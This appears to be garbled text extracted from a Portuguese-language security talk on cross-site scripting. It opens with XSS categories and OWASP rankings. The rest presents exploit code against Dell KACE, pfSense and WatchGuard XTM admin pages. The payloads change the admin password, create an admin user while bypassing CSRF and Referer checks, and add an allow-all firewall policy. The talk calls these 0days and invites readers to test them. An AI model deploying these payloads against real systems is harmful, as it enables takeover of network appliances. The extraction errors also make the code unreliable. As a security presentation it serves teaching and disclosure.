Quem tem medo de XSS? William Costa

Tamanho: px

Começar a partir da página:

Download "Quem tem medo de XSS? William Costa"

Rebeca Corte-Real Sequeira
10 Há anos
Visualizações:

1 Quem tem medo de XSS? William Costa

2 Composição do XSS. Os XSS s normalmente são divididos em 3 categorias Reflected XSS Stored XSS DOM Based XSS

3 Reflected XSS Quando o usuário envia uma requisição durante uma consulta em uma pagina de pesquisa ou em uma variável. Ex: hfp:// XSS")</script>

em uma variável. Ex: hfp://www.vulneravel.com.

4 Stored XSS Isso ocorre quando o Script e salvo no servidor sendo assim carregado a cada vez que a pagina for acessada. Ex: Mensagem em um fórum, formulares de compras, entre outros Após adicionar o comentário qualquer pessoa que acesse o Forum recebem a tela

Ex: Mensagem em um fórum, formulares de compras, entre outros

5 DOM XSS O DOM XSS é quando é inserido o payload dentro de uma variável ujlizada por um script Ex: Campos de interação em tempo real. <img src=search onerror=alert('dom_xss')>

6 O XSS aparece no top 10 do OWASP desde seu primeiro relatório. OWASP Top Top VulnerabiliIes in Web ApplicaIons A1 Unvalidated Parameters A2 Broken Access Control A3 Broken Account and Session Management A4 Cross- Site Scrip8ng (XSS) Flaws A5 Buffer Overflows A6 Command InjecIon Flaws A7 Error Handling Problems A8 Insecure Use of Cryptography A9 Remote AdministraIon Flaws A10 Web and ApplicaIon Server MisconfiguraIon

A3 Broken Account and Session Management A4 Cross- Site Scrip8ng (XSS) Flaws A5 Buffer Overflows A6

7 E após 10 Anos ele conjnua entre os 10 OWASP Top (New) A1 InjecIon A2 Broken AuthenIcaIon and Session Management A3 Cross- Site Scrip8ng (XSS) A4 Insecure Direct Object References A5 Security MisconfiguraIon A6 SensiIve Data Exposure A7 Missing FuncIon Level Access Control A8 Cross- Site Request Forgery (CSRF) A9 Using Known Vulnerable Components A10 Unvalidated Redirects and Forwards

Security MisconfiguraIon A6 SensiIve Data Exposure A7 Missing FuncIon Level Access Control A8

8 Como são apresentadas as Falhas de XSS

9 Como normalmente é apresentando o Impacto do XSS

10 Como elas deferiam ser apresentadas

11 Como realmente são os Impactos dos XSS

12 Falha #1 Dell KACE V Falha na pagina de criação de um Ticket. Proteções: Flag HFpOnly Token CSRF URL Vulnerável: /adminui/bug_report.php?locajon=/adminui/jcket.php?id=20000<script>alert("xss");</ script>

13 Pagina onde ocorre a vulnerabilidade Alguma Ideia de como podemos ir além do alert?

14 Função Alvo

15 Exploit para alteração da senha do ADMIN. Um simples Iframe já nos possibilita a alteração de senha do usuário administrador. document.write('<iframe width=0 height=0 name="xss" src="hlps://uvo128qv8c8mqmdetcu.vm.cld.sr/adminui/user.php?id=10"> iframe>'); funcion append(senha) { window.frames['xss'].document.getelementsbyname('farray[password]')[0].value="senha123"; window.frames['xss'].document.getelementsbyname('farray[password_confirm]')[0].value="senha123"; window.frames['xss'].document.userform.submit(); } settimeout("append(\"imeout\")",2500);

id=10"> iframe>'); funcion append(senha) { window.frames['xss'].document.getelementsbyname('farray[password]')[0].value="senha123"; window.

16 Falha #2 PFSENSE V Falha na pagina de remoção de CapJves portais. Proteções: Token CSRF Checagem do Header HTTP_REFERER

17 Pagina onde ocorre a vulnerabilidade Alguma Ideia?

18 Função Alvo

19 Exploit para criação de Usuário de Administração. O Exploit cria um formulário dentro da pagina vulnerável obtém o TOKEN CSRF da mesma e envia o form para a pagina de criação de usuários bypassando a proteção do HTTP_REFERER document.write('<iframe width=1000 height=1000 name="xss"> </iframe>'); xss.document.write('<body><form id="csrf" acion="hlp:// /system_usermanager.php" method="post" name="csrf">'); xss.document.write('<input name=" csrf_magic" value=""</input>'); xss.document.write('<input name="utype" value="user"> </input>'); xss.document.write('<input name="usernamefld" value="teste"> </input>'); xss.document.write('<input name="passwordfld1" value="123456"> </input>'); xss.document.write('<input name="passwordfld2" value="123456"> </input>'); xss.document.write('<input name="groups[]" value="admins"> </input>'); xss.document.write('<input name="save" value="save"> </input>'); xss.document.write('</form>'); xss.document.write('</body>'); window.frames['xss'].document.getelementsbyname(' csrf_magic')[0].value=csrfmagictoken; window.frames['xss'].document.csrf.submit();

write('<iframe width=1000 height=1000 name="xss"> </iframe>'); xss.document.write('<body><form id="csrf" acion="hlp://192.168.217.100/system_usermanager.php" method="post" name="csrf">'); xss.

20 Falha #3 Firewall WatchGuard XTM V B Falha na pagina de Gerenciamento de Access Point. Proteções: Token CSRF Flag HFpOnly

21 Pagina onde ocorre a vulnerabilidade URL Vulneravel: /network/controller/ap?acjon=add"</script><script>alert( XSS )</script> Ideias??

22 Função Alvo

23 Exploit. Vamos usar uma função JSON que envie via post todas informações necessárias para criação de uma poliica que permita tudo de fora para dentro da rede. $.ajax({ type: "POST", url: "hlps:// :8080/put_data/", data: '{" class ":"PageFirewallPolicyObj"," module ":"modules.scripts.page.firewall.pagefirewallpolicyobj","is_new":1,"pol": {" class ":"FirewallPolicySe~ngsObj"," module ":"modules.scripts.page.firewall.pagefirewallpolicyobj","name":"exploit- Rule","enabled":true,"descripIon":"Policy added on T18:02:38-03:00.","property": 0,"type":"Firewall","firewall":"Allowed","reject_acIon":"TCP_RST","from_list":[{"type":0,"address":"Any","interface":"Any","user":"Any","user_display_info": {"type":"","name":"","auth_domain":""},"display_name":"","alias_name":"any- External","address_type":- 1,"tunnel_type":false,"name":"","obj":null}],"to_list": [{"type":0,"address":"any","interface":"any","user":"any","user_display_info":{"type":"","name":"","auth_domain":""},"display_name":"","alias_name":"any- Trusted","address_type":- 1,"tunnel_type":false,"name":"","obj":null}],"policy_nat":"","proxy":"","service":"Any","schedule":"Always On","app_acIon":"","forward_traffic_mgmt":"","reverse_traffic_mgmt":"","ips_monitor_enabled":true,"quota_enabled":false,"auto_block_enabled": 0,"idle_Imeout":180,"idle_Imeout_enabled":0,"policy_sIcky_Imer":0,"policy_sIcky_Imer_enabled":0,"using_global_sIcky_se~ng": 1,"apply_one_to_one_nat_rules":1,"apply_dnat_global":1,"apply_dnat_all_traffic":0,"dnat_src_ip":" ","dnat_src_ip_enabled":0,"log_enabled": 0,"snmp_enabled":0,"noIficaIon_enabled":0,"noIficaIon_type":0,"launch_interval":900,"repeat_count":10,"enable_qos":0,"marking_field":1,"marking_method": 0,"dscp_value":0,"precedence_value":0,"priority_method":1,"priority":0,"proxy_qos":0,"audio_priority":0,"video_priority":0,"data_priority":0,"pbr_enabled": 0,"pbr_interface":"","failover_enabled":0,"abs_policy_rouIng":[],"connecIon_rate_enabled":0,"connecIon_rate":100,"use_policy_based_icmp": 0,"pmtu_discovery":1,"Ime_exceeded":1,"network_unreachable":1,"host_unreachable":1,"port_unreachable":1,"protocol_unreachable":1,"tag_list": []},"page_security_app_control_config_obj":null,"page_firewall_scheduling_config_obj":null,"schedule_predefined_flag": 1,"page_firewall_proxy_aciton_obj":null,"proxy_acIon_predefined_flag":0,"global_ips_enabled":false,"global_quota_enabled":false,"alias_user_hash": {},"proxy_policy_flag":false,"proxy_acions":[],"app_acions":[],"global_qos_enable":false,"port_protocol_se~ngs": [{"protocol":"any","port":""}],"proxy_type":"","muli_wan_enabled":0,"muliwan_algo":0,"ext_interfaces": [{"if_dev_name":"eth0","data":"external","name":"external","if_num":0}],"vif_list":[],"helper_in _list":[],"helper_tunnel_list":[],"helper_alias_list": [],"helper_fw_group_list":[],"helper_fw_user_list":[],"helper_pptp_group_list":[],"helper_pptp_user_list":[],"helper_sslvpn_group_list": [],"helper_sslvpn_user_list":[],"helper_user_group_list":[],"external_ip_list":[],"helper_snat_list":[],"helper_slb_list": [],"traffic_mgmt_enabled":false,"helper_tm_acions":[],"helper_tag_list":[],"helper_schedule_list":[],"helper_app_acion_list": [],"rip_enabled":false,"ospf_enabled":false,"bgp_enabled":false}', contenttype: "applicaion/json; charset=utf- 8", accept: "*/*", datatype: "json",

24 As 3 vulnerabilidades apresentadas aqui são 0days, Baixem e façam seus próprios testes J

25 <script>alert(string(/perguntas?/).substr(1,10) ); </script> william.costa arroba gmail.com

Documentos relacionados

Segurança no Plone. Fabiano Weimar dos Santos [Xiru] [email protected]

Segurança no Plone. Fabiano Weimar dos Santos [Xiru] xiru@xiru.org Segurança no Plone Fabiano Weimar dos Santos [Xiru] [email protected] Roteiro Um pouco sobre mim... Introdução Como Plone É tão Seguro? Modelo de Segurança OWASP Top 10 Segurança no Plone - Provedor PyTown.com